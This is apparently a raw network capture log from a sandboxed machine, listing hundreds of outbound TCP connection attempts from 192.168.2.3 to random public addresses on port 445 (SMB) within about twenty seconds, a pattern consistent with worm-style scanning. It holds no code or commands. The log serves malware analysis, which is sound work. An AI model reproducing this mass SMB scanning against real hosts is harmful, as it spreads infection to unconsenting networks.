                                                                                            Dec 22, 2022 10:04:43.087806940 CET50124445192.168.2.383.14.112.230
                                                                                            Dec 22, 2022 10:04:43.088392973 CET50125445192.168.2.326.149.133.217
                                                                                            Dec 22, 2022 10:04:43.134260893 CET50126445192.168.2.3172.164.75.155
                                                                                            Dec 22, 2022 10:04:43.138684988 CET50127445192.168.2.386.164.47.254
                                                                                            Dec 22, 2022 10:04:43.140530109 CET50128445192.168.2.358.24.12.251
                                                                                            Dec 22, 2022 10:04:43.253638983 CET50130445192.168.2.3191.71.222.53
                                                                                            Dec 22, 2022 10:04:43.254324913 CET50131445192.168.2.385.79.8.211
                                                                                            Dec 22, 2022 10:04:43.254507065 CET50132445192.168.2.396.17.158.210
                                                                                            Dec 22, 2022 10:04:43.445722103 CET50136445192.168.2.3103.227.224.53
                                                                                            Dec 22, 2022 10:04:43.664422035 CET50138445192.168.2.3179.109.171.87
                                                                                            Dec 22, 2022 10:04:43.899646997 CET50140445192.168.2.3135.90.155.96
                                                                                            Dec 22, 2022 10:04:43.900417089 CET50141445192.168.2.394.171.153.75
                                                                                            Dec 22, 2022 10:04:44.122890949 CET50142445192.168.2.3163.108.79.158
                                                                                            Dec 22, 2022 10:04:44.312410116 CET50143445192.168.2.347.135.232.135
                                                                                            Dec 22, 2022 10:04:44.312925100 CET50144445192.168.2.3165.78.160.211
                                                                                            Dec 22, 2022 10:04:44.313096046 CET50145445192.168.2.335.170.243.218
                                                                                            Dec 22, 2022 10:04:44.421137094 CET50146445192.168.2.383.111.142.173
                                                                                            Dec 22, 2022 10:04:44.421799898 CET50147445192.168.2.319.204.51.4
                                                                                            Dec 22, 2022 10:04:44.422035933 CET50148445192.168.2.314.105.172.22
                                                                                            Dec 22, 2022 10:04:44.422507048 CET50149445192.168.2.3205.144.234.74
                                                                                            Dec 22, 2022 10:04:44.423286915 CET50150445192.168.2.3140.159.219.154
                                                                                            Dec 22, 2022 10:04:44.424037933 CET50151445192.168.2.3133.170.114.172
                                                                                            Dec 22, 2022 10:04:44.584935904 CET44550149205.144.234.74192.168.2.3
                                                                                            Dec 22, 2022 10:04:44.651465893 CET50152445192.168.2.389.49.42.171
                                                                                            Dec 22, 2022 10:04:44.790669918 CET50153445192.168.2.3121.162.14.166
                                                                                            Dec 22, 2022 10:04:44.793196917 CET50154445192.168.2.376.13.133.9
                                                                                            Dec 22, 2022 10:04:45.024313927 CET50155445192.168.2.395.57.119.202
                                                                                            Dec 22, 2022 10:04:45.024430037 CET50156445192.168.2.31.158.141.162
                                                                                            Dec 22, 2022 10:04:45.086081028 CET50149445192.168.2.3205.144.234.74
                                                                                            Dec 22, 2022 10:04:45.227114916 CET50157445192.168.2.386.44.21.150
                                                                                            Dec 22, 2022 10:04:45.248586893 CET44550149205.144.234.74192.168.2.3
                                                                                            Dec 22, 2022 10:04:45.758001089 CET50149445192.168.2.3205.144.234.74
                                                                                            Dec 22, 2022 10:04:45.920504093 CET44550149205.144.234.74192.168.2.3
                                                                                            Dec 22, 2022 10:04:46.062382936 CET50158445192.168.2.3185.182.222.231
                                                                                            Dec 22, 2022 10:04:46.062758923 CET50159445192.168.2.3211.208.174.88
                                                                                            Dec 22, 2022 10:04:46.063262939 CET50160445192.168.2.38.195.195.253
                                                                                            Dec 22, 2022 10:04:46.063746929 CET50161445192.168.2.3106.226.249.114
                                                                                            Dec 22, 2022 10:04:46.063926935 CET50162445192.168.2.3182.240.24.47
                                                                                            Dec 22, 2022 10:04:46.064030886 CET50163445192.168.2.338.229.169.246
                                                                                            Dec 22, 2022 10:04:46.064626932 CET50164445192.168.2.368.54.199.45
                                                                                            Dec 22, 2022 10:04:46.065336943 CET50165445192.168.2.3128.245.135.183
                                                                                            Dec 22, 2022 10:04:46.065587044 CET50166445192.168.2.3123.185.230.160
                                                                                            Dec 22, 2022 10:04:46.066267967 CET50167445192.168.2.3141.173.194.141
                                                                                            Dec 22, 2022 10:04:46.066967964 CET50168445192.168.2.3152.83.207.126
                                                                                            Dec 22, 2022 10:04:46.067224026 CET50169445192.168.2.3195.188.167.14
                                                                                            Dec 22, 2022 10:04:46.169929028 CET50170445192.168.2.3119.53.173.225
                                                                                            Dec 22, 2022 10:04:46.170099974 CET50171445192.168.2.322.77.100.62
                                                                                            Dec 22, 2022 10:04:46.363148928 CET50172445192.168.2.3205.137.135.113
                                                                                            Dec 22, 2022 10:04:48.225198984 CET50174445192.168.2.3170.93.18.138
                                                                                            Dec 22, 2022 10:04:48.225204945 CET50180445192.168.2.388.195.160.254
                                                                                            Dec 22, 2022 10:04:48.225205898 CET50179445192.168.2.3137.242.185.252
                                                                                            Dec 22, 2022 10:04:48.225204945 CET50173445192.168.2.3199.197.245.32
                                                                                            Dec 22, 2022 10:04:48.225205898 CET50181445192.168.2.3168.247.43.36
                                                                                            Dec 22, 2022 10:04:48.225204945 CET50176445192.168.2.3202.15.232.134
                                                                                            Dec 22, 2022 10:04:48.225204945 CET50178445192.168.2.3144.96.215.218
                                                                                            Dec 22, 2022 10:04:48.225208998 CET50177445192.168.2.3177.148.218.217
                                                                                            Dec 22, 2022 10:04:48.225208998 CET50175445192.168.2.350.37.174.221
                                                                                            Dec 22, 2022 10:04:48.225296021 CET50182445192.168.2.3147.49.174.70
                                                                                            Dec 22, 2022 10:04:48.225882053 CET50183445192.168.2.3173.78.169.253
                                                                                            Dec 22, 2022 10:04:48.226275921 CET50184445192.168.2.3211.243.209.123
                                                                                            Dec 22, 2022 10:04:48.227972984 CET50185445192.168.2.3169.30.47.92
                                                                                            Dec 22, 2022 10:04:48.254477024 CET50186445192.168.2.370.80.26.172
                                                                                            Dec 22, 2022 10:04:48.255069971 CET50187445192.168.2.327.247.167.14
                                                                                            Dec 22, 2022 10:04:48.485526085 CET50188445192.168.2.3114.162.201.208
                                                                                            Dec 22, 2022 10:04:49.341672897 CET50189445192.168.2.395.61.64.1
                                                                                            Dec 22, 2022 10:04:49.341918945 CET50190445192.168.2.3119.51.204.20
                                                                                            Dec 22, 2022 10:04:49.341998100 CET50191445192.168.2.372.95.130.9
                                                                                            Dec 22, 2022 10:04:49.342118025 CET50192445192.168.2.3194.44.190.93
                                                                                            Dec 22, 2022 10:04:49.342212915 CET50193445192.168.2.313.39.8.43
                                                                                            Dec 22, 2022 10:04:49.342319965 CET50194445192.168.2.331.145.245.221
                                                                                            Dec 22, 2022 10:04:49.342578888 CET50196445192.168.2.3136.14.88.59
                                                                                            Dec 22, 2022 10:04:49.342587948 CET50195445192.168.2.381.64.84.48
                                                                                            Dec 22, 2022 10:04:49.343405008 CET50197445192.168.2.3101.158.28.231
                                                                                            Dec 22, 2022 10:04:49.350037098 CET50198445192.168.2.3182.246.188.78
                                                                                            Dec 22, 2022 10:04:49.350220919 CET50199445192.168.2.3161.51.209.109
                                                                                            Dec 22, 2022 10:04:49.350327015 CET50200445192.168.2.3137.18.115.190
                                                                                            Dec 22, 2022 10:04:49.355477095 CET50201445192.168.2.336.172.245.124
                                                                                            Dec 22, 2022 10:04:49.368000984 CET50202445192.168.2.35.44.171.84
                                                                                            Dec 22, 2022 10:04:49.368624926 CET50203445192.168.2.364.115.223.167
                                                                                            Dec 22, 2022 10:04:49.586925030 CET50204445192.168.2.3123.80.33.154
                                                                                            Dec 22, 2022 10:04:50.405299902 CET50205445192.168.2.358.51.178.77
                                                                                            Dec 22, 2022 10:04:50.589189053 CET50206445192.168.2.391.30.145.192
                                                                                            Dec 22, 2022 10:04:50.589395046 CET50207445192.168.2.326.102.9.133
                                                                                            Dec 22, 2022 10:04:50.589497089 CET50208445192.168.2.347.58.177.247
                                                                                            Dec 22, 2022 10:04:50.589659929 CET50209445192.168.2.3213.216.208.28
                                                                                            Dec 22, 2022 10:04:50.589720964 CET50210445192.168.2.369.114.240.174
                                                                                            Dec 22, 2022 10:04:50.589776993 CET50211445192.168.2.3103.118.111.171
                                                                                            Dec 22, 2022 10:04:50.589869976 CET50212445192.168.2.3126.99.235.75
                                                                                            Dec 22, 2022 10:04:50.589956045 CET50213445192.168.2.3153.60.159.248
                                                                                            Dec 22, 2022 10:04:50.590393066 CET50214445192.168.2.3180.23.229.9
                                                                                            Dec 22, 2022 10:04:50.600966930 CET50215445192.168.2.3107.24.42.200
                                                                                            Dec 22, 2022 10:04:50.655411959 CET50216445192.168.2.323.197.135.243
                                                                                            Dec 22, 2022 10:04:50.655478001 CET50218445192.168.2.362.123.190.97
                                                                                            Dec 22, 2022 10:04:50.655513048 CET50217445192.168.2.353.65.142.215
                                                                                            Dec 22, 2022 10:04:50.656187057 CET50219445192.168.2.3102.14.230.157
                                                                                            Dec 22, 2022 10:04:50.656972885 CET50220445192.168.2.345.182.128.37
                                                                                            Dec 22, 2022 10:04:50.740977049 CET50221445192.168.2.398.104.115.201
                                                                                            Dec 22, 2022 10:04:51.574970007 CET50222445192.168.2.370.193.180.48
                                                                                            Dec 22, 2022 10:04:51.718231916 CET50223445192.168.2.3133.7.77.89
                                                                                            Dec 22, 2022 10:04:51.718573093 CET50224445192.168.2.399.175.86.30
                                                                                            Dec 22, 2022 10:04:51.718847036 CET50225445192.168.2.389.230.138.248
                                                                                            Dec 22, 2022 10:04:51.719058990 CET50226445192.168.2.383.128.57.27
                                                                                            Dec 22, 2022 10:04:51.719242096 CET50227445192.168.2.3222.28.58.113
                                                                                            Dec 22, 2022 10:04:51.719388962 CET50228445192.168.2.34.177.185.140
                                                                                            Dec 22, 2022 10:04:51.719536066 CET50229445192.168.2.3117.3.237.204
                                                                                            Dec 22, 2022 10:04:51.719639063 CET50230445192.168.2.36.26.175.189
                                                                                            Dec 22, 2022 10:04:51.723913908 CET50231445192.168.2.3148.79.52.199
                                                                                            Dec 22, 2022 10:04:51.724373102 CET50232445192.168.2.378.223.229.139
                                                                                            Dec 22, 2022 10:04:51.775506973 CET50233445192.168.2.3121.244.145.224
                                                                                            Dec 22, 2022 10:04:51.775959969 CET50234445192.168.2.3213.35.189.0
                                                                                            Dec 22, 2022 10:04:51.776752949 CET50235445192.168.2.314.54.191.217
                                                                                            Dec 22, 2022 10:04:51.777267933 CET50236445192.168.2.392.102.94.161
                                                                                            Dec 22, 2022 10:04:51.777312040 CET50237445192.168.2.3206.183.63.2
                                                                                            Dec 22, 2022 10:04:51.876116991 CET50238445192.168.2.3156.74.5.216
                                                                                            Dec 22, 2022 10:04:52.001889944 CET4968380192.168.2.393.184.220.29
                                                                                            Dec 22, 2022 10:04:52.415885925 CET50239445192.168.2.3218.166.178.26
                                                                                            Dec 22, 2022 10:04:52.700731993 CET50240445192.168.2.333.22.20.5
                                                                                            Dec 22, 2022 10:04:52.837760925 CET50241445192.168.2.3167.41.164.152
                                                                                            Dec 22, 2022 10:04:52.837992907 CET50242445192.168.2.389.92.154.12
                                                                                            Dec 22, 2022 10:04:52.838004112 CET50243445192.168.2.343.154.17.153
                                                                                            Dec 22, 2022 10:04:52.838110924 CET50244445192.168.2.3201.118.115.44
                                                                                            Dec 22, 2022 10:04:52.838202953 CET50245445192.168.2.398.80.238.143
                                                                                            Dec 22, 2022 10:04:52.838299990 CET50246445192.168.2.322.132.92.199
                                                                                            Dec 22, 2022 10:04:52.838953972 CET50247445192.168.2.353.223.253.14
                                                                                            Dec 22, 2022 10:04:52.839014053 CET50248445192.168.2.393.26.126.136
                                                                                            Dec 22, 2022 10:04:52.839091063 CET50249445192.168.2.355.106.157.127
                                                                                            Dec 22, 2022 10:04:52.839180946 CET50250445192.168.2.366.209.184.124
                                                                                            Dec 22, 2022 10:04:52.901026011 CET50251445192.168.2.317.172.96.154
                                                                                            Dec 22, 2022 10:04:52.902226925 CET50252445192.168.2.366.151.147.252
                                                                                            Dec 22, 2022 10:04:52.903119087 CET50253445192.168.2.3184.200.245.33
                                                                                            Dec 22, 2022 10:04:52.904113054 CET50254445192.168.2.3210.41.58.52
                                                                                            Dec 22, 2022 10:04:52.904817104 CET50255445192.168.2.3208.86.241.153
                                                                                            Dec 22, 2022 10:04:52.994329929 CET50256445192.168.2.353.213.45.172
                                                                                            Dec 22, 2022 10:04:53.103458881 CET4455024343.154.17.153192.168.2.3
                                                                                            Dec 22, 2022 10:04:53.525346994 CET50257445192.168.2.3149.168.154.18
                                                                                            Dec 22, 2022 10:04:53.743139982 CET50243445192.168.2.343.154.17.153
                                                                                            Dec 22, 2022 10:04:53.806751966 CET50258445192.168.2.372.154.29.128
                                                                                            Dec 22, 2022 10:04:53.983160973 CET50259445192.168.2.3214.90.20.120
                                                                                            Dec 22, 2022 10:04:53.983510971 CET50260445192.168.2.33.129.123.145
                                                                                            Dec 22, 2022 10:04:53.983535051 CET50261445192.168.2.376.119.112.69
                                                                                            Dec 22, 2022 10:04:53.983840942 CET50262445192.168.2.3126.207.157.93
                                                                                            Dec 22, 2022 10:04:53.983850002 CET50263445192.168.2.3148.13.109.2
                                                                                            Dec 22, 2022 10:04:53.983973026 CET50264445192.168.2.3140.233.100.223
                                                                                            Dec 22, 2022 10:04:53.984098911 CET50265445192.168.2.3219.139.111.66
                                                                                            Dec 22, 2022 10:04:53.984337091 CET50266445192.168.2.3115.3.129.84
                                                                                            Dec 22, 2022 10:04:53.984462023 CET50267445192.168.2.3141.164.177.191
                                                                                            Dec 22, 2022 10:04:53.984787941 CET50268445192.168.2.3125.17.22.86
                                                                                            Dec 22, 2022 10:04:54.008589029 CET4455024343.154.17.153192.168.2.3
                                                                                            Dec 22, 2022 10:04:54.010133028 CET50269445192.168.2.3188.71.140.117
                                                                                            Dec 22, 2022 10:04:54.010381937 CET50270445192.168.2.3178.147.19.152
                                                                                            Dec 22, 2022 10:04:54.010895967 CET50271445192.168.2.378.237.217.212
                                                                                            Dec 22, 2022 10:04:54.011497974 CET50272445192.168.2.364.204.90.122
                                                                                            Dec 22, 2022 10:04:54.012053967 CET50273445192.168.2.394.237.50.41
                                                                                            Dec 22, 2022 10:04:54.103761911 CET50274445192.168.2.3190.12.192.129
                                                                                            Dec 22, 2022 10:04:54.273056030 CET44550262126.207.157.93192.168.2.3
                                                                                            Dec 22, 2022 10:04:54.377173901 CET804968793.184.220.29192.168.2.3
                                                                                            Dec 22, 2022 10:04:54.377294064 CET4968780192.168.2.393.184.220.29
                                                                                            Dec 22, 2022 10:04:54.431791067 CET50275445192.168.2.3181.182.212.64
                                                                                            Dec 22, 2022 10:04:54.650012970 CET50276445192.168.2.364.210.122.156
                                                                                            Dec 22, 2022 10:04:54.774610043 CET50262445192.168.2.3126.207.157.93
                                                                                            Dec 22, 2022 10:04:54.948731899 CET50277445192.168.2.392.147.181.124
                                                                                            Dec 22, 2022 10:04:55.064042091 CET44550262126.207.157.93192.168.2.3
                                                                                            Dec 22, 2022 10:04:55.105010033 CET50278445192.168.2.374.77.78.240
                                                                                            Dec 22, 2022 10:04:55.105032921 CET50279445192.168.2.371.209.24.206
                                                                                            Dec 22, 2022 10:04:55.106586933 CET50280445192.168.2.3170.22.10.22
                                                                                            Dec 22, 2022 10:04:55.107038975 CET50281445192.168.2.33.220.184.176
                                                                                            Dec 22, 2022 10:04:55.107561111 CET50282445192.168.2.3105.4.142.129
                                                                                            Dec 22, 2022 10:04:55.107872963 CET50283445192.168.2.3214.145.169.92
                                                                                            Dec 22, 2022 10:04:55.109179974 CET50284445192.168.2.359.230.112.190
                                                                                            Dec 22, 2022 10:04:55.109422922 CET50285445192.168.2.370.192.55.231
                                                                                            Dec 22, 2022 10:04:55.109671116 CET50286445192.168.2.324.198.224.116
                                                                                            Dec 22, 2022 10:04:55.109827995 CET50287445192.168.2.358.222.44.51
                                                                                            Dec 22, 2022 10:04:55.119321108 CET50288445192.168.2.3223.19.67.113
                                                                                            Dec 22, 2022 10:04:55.120136023 CET50289445192.168.2.3121.120.204.193
                                                                                            Dec 22, 2022 10:04:55.120937109 CET50290445192.168.2.3118.56.240.26
                                                                                            Dec 22, 2022 10:04:55.121582031 CET50291445192.168.2.393.164.179.131
                                                                                            Dec 22, 2022 10:04:55.122419119 CET50292445192.168.2.3133.214.245.93
                                                                                            Dec 22, 2022 10:04:55.213743925 CET50293445192.168.2.344.87.182.149
                                                                                            Dec 22, 2022 10:04:55.409070015 CET49686443192.168.2.323.211.5.146
                                                                                            Dec 22, 2022 10:04:55.409471989 CET4968780192.168.2.393.184.220.29
                                                                                            Dec 22, 2022 10:04:55.556242943 CET50294445192.168.2.393.86.175.176
                                                                                            Dec 22, 2022 10:04:55.760601044 CET50295445192.168.2.3192.173.66.200
                                                                                            Dec 22, 2022 10:04:56.072818041 CET50296445192.168.2.39.31.107.23
                                                                                            Dec 22, 2022 10:04:56.228441954 CET50297445192.168.2.3142.241.63.127
                                                                                            Dec 22, 2022 10:04:56.228672028 CET50298445192.168.2.368.191.107.216
                                                                                            Dec 22, 2022 10:04:56.229458094 CET50299445192.168.2.3220.21.253.173
                                                                                            Dec 22, 2022 10:04:56.229796886 CET50300445192.168.2.341.30.4.147
                                                                                            Dec 22, 2022 10:04:56.230016947 CET50301445192.168.2.3211.22.111.168
                                                                                            Dec 22, 2022 10:04:56.230165958 CET50302445192.168.2.348.68.82.148
                                                                                            Dec 22, 2022 10:04:56.231066942 CET50303445192.168.2.3119.80.163.151
                                                                                            Dec 22, 2022 10:04:56.231338978 CET50304445192.168.2.3202.193.133.188
                                                                                            Dec 22, 2022 10:04:56.231710911 CET50305445192.168.2.3223.251.236.216
                                                                                            Dec 22, 2022 10:04:56.231734991 CET50306445192.168.2.3218.253.139.30
                                                                                            Dec 22, 2022 10:04:56.245548964 CET50307445192.168.2.3189.198.147.178
                                                                                            Dec 22, 2022 10:04:56.246529102 CET50308445192.168.2.356.108.210.123
                                                                                            Dec 22, 2022 10:04:56.247308016 CET50309445192.168.2.3106.46.220.78
                                                                                            Dec 22, 2022 10:04:56.248146057 CET50310445192.168.2.362.96.20.212
                                                                                            Dec 22, 2022 10:04:56.249017000 CET50311445192.168.2.3190.76.252.188
                                                                                            Dec 22, 2022 10:04:56.322387934 CET50312445192.168.2.3161.191.244.105
                                                                                            Dec 22, 2022 10:04:56.447488070 CET50313445192.168.2.339.73.193.150
                                                                                            Dec 22, 2022 10:04:56.666023016 CET50314445192.168.2.31.57.145.54
                                                                                            Dec 22, 2022 10:04:56.869446993 CET50315445192.168.2.352.183.247.109
                                                                                            Dec 22, 2022 10:04:57.190604925 CET50316445192.168.2.310.10.4.248
                                                                                            Dec 22, 2022 10:04:57.338134050 CET50317445192.168.2.3212.34.10.160
                                                                                            Dec 22, 2022 10:04:57.338164091 CET50318445192.168.2.3201.130.64.201
                                                                                            Dec 22, 2022 10:04:57.338340998 CET50319445192.168.2.3208.237.167.34
                                                                                            Dec 22, 2022 10:04:57.338888884 CET50320445192.168.2.3124.195.134.212
                                                                                            Dec 22, 2022 10:04:57.339060068 CET50321445192.168.2.3205.26.221.156
                                                                                            Dec 22, 2022 10:04:57.339509964 CET50322445192.168.2.3158.159.225.50
                                                                                            Dec 22, 2022 10:04:57.339770079 CET50323445192.168.2.3125.177.14.243
                                                                                            Dec 22, 2022 10:04:57.339885950 CET50324445192.168.2.38.250.160.168
                                                                                            Dec 22, 2022 10:04:57.340058088 CET50325445192.168.2.3153.154.134.151
                                                                                            Dec 22, 2022 10:04:57.340226889 CET50326445192.168.2.325.75.236.71
                                                                                            Dec 22, 2022 10:04:57.354023933 CET50327445192.168.2.3198.205.8.109
                                                                                            Dec 22, 2022 10:04:57.355227947 CET50328445192.168.2.3135.140.42.123
                                                                                            Dec 22, 2022 10:04:57.355715990 CET50329445192.168.2.3196.189.47.85
                                                                                            Dec 22, 2022 10:04:57.355818033 CET50330445192.168.2.3196.213.153.207
                                                                                            Dec 22, 2022 10:04:57.355950117 CET50331445192.168.2.3158.199.90.61
                                                                                            Dec 22, 2022 10:04:57.449076891 CET50332445192.168.2.3138.186.67.212
                                                                                            Dec 22, 2022 10:04:57.557157993 CET50333445192.168.2.38.224.92.80
                                                                                            Dec 22, 2022 10:04:57.777973890 CET50334445192.168.2.3106.78.101.70
                                                                                            Dec 22, 2022 10:04:57.994671106 CET50335445192.168.2.387.154.184.132
                                                                                            Dec 22, 2022 10:04:58.292862892 CET50336445192.168.2.3141.197.189.188
                                                                                            Dec 22, 2022 10:04:58.447419882 CET50337445192.168.2.3160.1.174.68
                                                                                            Dec 22, 2022 10:04:58.447489023 CET50338445192.168.2.377.82.3.112
                                                                                            Dec 22, 2022 10:04:58.447742939 CET50339445192.168.2.395.142.173.18
                                                                                            Dec 22, 2022 10:04:58.447923899 CET50340445192.168.2.355.41.87.34
                                                                                            Dec 22, 2022 10:04:58.448081970 CET50341445192.168.2.3145.25.28.31
                                                                                            Dec 22, 2022 10:04:58.448196888 CET50342445192.168.2.363.122.106.16
                                                                                            Dec 22, 2022 10:04:58.448364019 CET50343445192.168.2.3213.252.111.64
                                                                                            Dec 22, 2022 10:04:58.448901892 CET50344445192.168.2.3191.139.81.50
                                                                                            Dec 22, 2022 10:04:58.449582100 CET50345445192.168.2.3151.17.163.236
                                                                                            Dec 22, 2022 10:04:58.449815035 CET50346445192.168.2.3159.42.250.68
                                                                                            Dec 22, 2022 10:04:58.464871883 CET50347445192.168.2.3173.22.135.250
                                                                                            Dec 22, 2022 10:04:58.467438936 CET50348445192.168.2.34.84.139.99
                                                                                            Dec 22, 2022 10:04:58.469518900 CET50349445192.168.2.354.4.147.16
                                                                                            Dec 22, 2022 10:04:58.469561100 CET50352445192.168.2.3184.93.216.117
                                                                                            Dec 22, 2022 10:04:58.469686031 CET50350445192.168.2.373.114.130.202
                                                                                            Dec 22, 2022 10:04:58.469715118 CET50351445192.168.2.3203.74.91.205
                                                                                            Dec 22, 2022 10:04:58.556579113 CET50353445192.168.2.33.72.241.30
                                                                                            Dec 22, 2022 10:04:58.900863886 CET50355445192.168.2.333.25.18.217
                                                                                            Dec 22, 2022 10:04:59.119102955 CET50356445192.168.2.3177.169.140.222
                                                                                            Dec 22, 2022 10:04:59.430593014 CET50357445192.168.2.36.27.209.69
                                                                                            Dec 22, 2022 10:04:59.572464943 CET50358445192.168.2.3216.166.168.31
                                                                                            Dec 22, 2022 10:04:59.572490931 CET50359445192.168.2.3214.206.209.13
                                                                                            Dec 22, 2022 10:04:59.572676897 CET50360445192.168.2.322.180.40.126
                                                                                            Dec 22, 2022 10:04:59.572727919 CET50361445192.168.2.3137.16.140.214
                                                                                            Dec 22, 2022 10:04:59.572794914 CET50362445192.168.2.3165.62.116.8
                                                                                            Dec 22, 2022 10:04:59.572974920 CET50363445192.168.2.3178.180.22.250
                                                                                            Dec 22, 2022 10:04:59.573025942 CET50364445192.168.2.360.161.118.37
                                                                                            Dec 22, 2022 10:04:59.573203087 CET50365445192.168.2.336.101.51.130
                                                                                            Dec 22, 2022 10:04:59.573720932 CET50366445192.168.2.372.2.166.163
                                                                                            Dec 22, 2022 10:04:59.574162960 CET50367445192.168.2.324.240.252.182
                                                                                            Dec 22, 2022 10:04:59.588454008 CET50368445192.168.2.3147.109.158.212
                                                                                            Dec 22, 2022 10:04:59.588965893 CET50369445192.168.2.3165.154.205.141
                                                                                            Dec 22, 2022 10:04:59.589078903 CET50370445192.168.2.3196.166.219.10
                                                                                            Dec 22, 2022 10:04:59.590960979 CET50371445192.168.2.376.149.170.185
                                                                                            Dec 22, 2022 10:04:59.591216087 CET50372445192.168.2.392.173.193.52
                                                                                            Dec 22, 2022 10:04:59.591322899 CET50373445192.168.2.3165.249.140.236
                                                                                            Dec 22, 2022 10:04:59.681502104 CET50374445192.168.2.3101.126.5.234
                                                                                            Dec 22, 2022 10:04:59.791563988 CET50375445192.168.2.3177.133.175.19
                                                                                            Dec 22, 2022 10:05:00.010059118 CET50376445192.168.2.34.95.100.250
                                                                                            Dec 22, 2022 10:05:00.228524923 CET50377445192.168.2.373.141.89.27
                                                                                            Dec 22, 2022 10:05:00.480644941 CET50378445192.168.2.3108.44.251.186
                                                                                            Dec 22, 2022 10:05:00.531544924 CET50379445192.168.2.365.79.66.248
                                                                                            Dec 22, 2022 10:05:00.697251081 CET50380445192.168.2.379.161.59.219
                                                                                            Dec 22, 2022 10:05:00.697308064 CET50381445192.168.2.3185.102.124.0
                                                                                            Dec 22, 2022 10:05:00.697448969 CET50382445192.168.2.3139.203.169.88
                                                                                            Dec 22, 2022 10:05:00.697511911 CET50383445192.168.2.3135.12.24.160
                                                                                            Dec 22, 2022 10:05:00.697582960 CET50384445192.168.2.3117.55.168.251
                                                                                            Dec 22, 2022 10:05:00.697645903 CET50385445192.168.2.3109.243.175.182
                                                                                            Dec 22, 2022 10:05:00.697704077 CET50386445192.168.2.352.116.137.101
                                                                                            Dec 22, 2022 10:05:00.697755098 CET50387445192.168.2.3124.136.139.194
                                                                                            Dec 22, 2022 10:05:00.698497057 CET50388445192.168.2.3210.95.163.15
                                                                                            Dec 22, 2022 10:05:00.698595047 CET50389445192.168.2.311.154.125.205
                                                                                            Dec 22, 2022 10:05:00.715337038 CET50390445192.168.2.368.35.195.36
                                                                                            Dec 22, 2022 10:05:00.715832949 CET50391445192.168.2.320.134.10.107
                                                                                            Dec 22, 2022 10:05:00.716563940 CET50392445192.168.2.3100.180.64.226
                                                                                            Dec 22, 2022 10:05:00.717168093 CET50393445192.168.2.39.175.131.172
                                                                                            Dec 22, 2022 10:05:00.717941046 CET50394445192.168.2.356.66.229.63
                                                                                            Dec 22, 2022 10:05:00.719554901 CET50395445192.168.2.3169.139.196.145
                                                                                            Dec 22, 2022 10:05:00.790865898 CET50396445192.168.2.3198.42.97.69
                                                                                            Dec 22, 2022 10:05:00.916774988 CET50397445192.168.2.3101.69.36.75
                                                                                            Dec 22, 2022 10:05:01.119841099 CET50398445192.168.2.3152.240.187.6
                                                                                            Dec 22, 2022 10:05:01.354357004 CET50399445192.168.2.3112.147.90.145
                                                                                            Dec 22, 2022 10:05:01.603905916 CET50400445192.168.2.3115.91.54.45
                                                                                            Dec 22, 2022 10:05:01.666493893 CET50401445192.168.2.3206.136.129.202
                                                                                            Dec 22, 2022 10:05:01.808737040 CET50402445192.168.2.3155.69.34.2
                                                                                            Dec 22, 2022 10:05:01.811721087 CET50403445192.168.2.3105.48.71.47
                                                                                            Dec 22, 2022 10:05:01.812586069 CET50404445192.168.2.3173.11.135.26
                                                                                            Dec 22, 2022 10:05:01.812860012 CET50405445192.168.2.357.227.152.120
                                                                                            Dec 22, 2022 10:05:01.813117981 CET50406445192.168.2.3155.84.46.216
                                                                                            Dec 22, 2022 10:05:01.813365936 CET50407445192.168.2.351.89.126.78
                                                                                            Dec 22, 2022 10:05:01.813889027 CET50408445192.168.2.3142.1.234.244
                                                                                            Dec 22, 2022 10:05:01.814395905 CET50409445192.168.2.3159.232.218.76
                                                                                            Dec 22, 2022 10:05:01.814722061 CET50410445192.168.2.337.125.62.121
                                                                                            Dec 22, 2022 10:05:01.814982891 CET50411445192.168.2.3156.206.120.235
                                                                                            Dec 22, 2022 10:05:01.847430944 CET50412445192.168.2.3156.132.248.201
                                                                                            Dec 22, 2022 10:05:01.848856926 CET50413445192.168.2.382.158.100.120
                                                                                            Dec 22, 2022 10:05:01.849093914 CET50414445192.168.2.3178.202.115.115
                                                                                            Dec 22, 2022 10:05:01.849210978 CET50415445192.168.2.3183.98.8.100
                                                                                            Dec 22, 2022 10:05:01.849246979 CET50416445192.168.2.3163.118.75.149
                                                                                            Dec 22, 2022 10:05:01.849345922 CET50417445192.168.2.3208.129.80.127
                                                                                            Dec 22, 2022 10:05:01.901273012 CET50418445192.168.2.3193.118.95.204
                                                                                            Dec 22, 2022 10:05:02.026443958 CET50419445192.168.2.3167.78.52.215
                                                                                            Dec 22, 2022 10:05:02.244493961 CET50420445192.168.2.357.206.213.242
                                                                                            Dec 22, 2022 10:05:02.479157925 CET50421445192.168.2.365.137.180.111
                                                                                            Dec 22, 2022 10:05:02.499896049 CET50422445192.168.2.396.77.245.82
                                                                                            Dec 22, 2022 10:05:02.729564905 CET50423445192.168.2.3188.159.171.146
                                                                                            Dec 22, 2022 10:05:02.792354107 CET50424445192.168.2.3113.244.67.180
                                                                                            Dec 22, 2022 10:05:02.939168930 CET50425445192.168.2.392.71.46.101
                                                                                            Dec 22, 2022 10:05:02.939687014 CET50426445192.168.2.349.13.108.213
                                                                                            Dec 22, 2022 10:05:02.939774036 CET50427445192.168.2.3212.47.176.212
                                                                                            Dec 22, 2022 10:05:02.939826012 CET50428445192.168.2.3114.231.73.99
                                                                                            Dec 22, 2022 10:05:02.939929962 CET50429445192.168.2.374.6.52.38
                                                                                            Dec 22, 2022 10:05:02.939964056 CET50430445192.168.2.3134.32.228.174
                                                                                            Dec 22, 2022 10:05:02.940053940 CET50431445192.168.2.388.177.182.97
                                                                                            Dec 22, 2022 10:05:02.940149069 CET50433445192.168.2.3155.241.111.121
                                                                                            Dec 22, 2022 10:05:02.940196037 CET50432445192.168.2.380.200.118.111
                                                                                            Dec 22, 2022 10:05:02.940700054 CET50434445192.168.2.3208.55.217.103
                                                                                            Dec 22, 2022 10:05:02.963820934 CET50435445192.168.2.3158.128.123.200
                                                                                            Dec 22, 2022 10:05:02.965923071 CET50436445192.168.2.347.179.97.44
                                                                                            Dec 22, 2022 10:05:02.966012001 CET50437445192.168.2.3204.123.31.123
                                                                                            Dec 22, 2022 10:05:02.966094017 CET50439445192.168.2.379.61.181.150
                                                                                            Dec 22, 2022 10:05:02.966150999 CET50440445192.168.2.33.43.204.99
                                                                                            Dec 22, 2022 10:05:02.966166019 CET50438445192.168.2.3138.74.134.231
                                                                                            Dec 22, 2022 10:05:03.028518915 CET50441445192.168.2.3220.30.146.159
                                                                                            Dec 22, 2022 10:05:03.138798952 CET50442445192.168.2.370.182.92.137
                                                                                            Dec 22, 2022 10:05:03.371218920 CET50443445192.168.2.3176.47.24.6
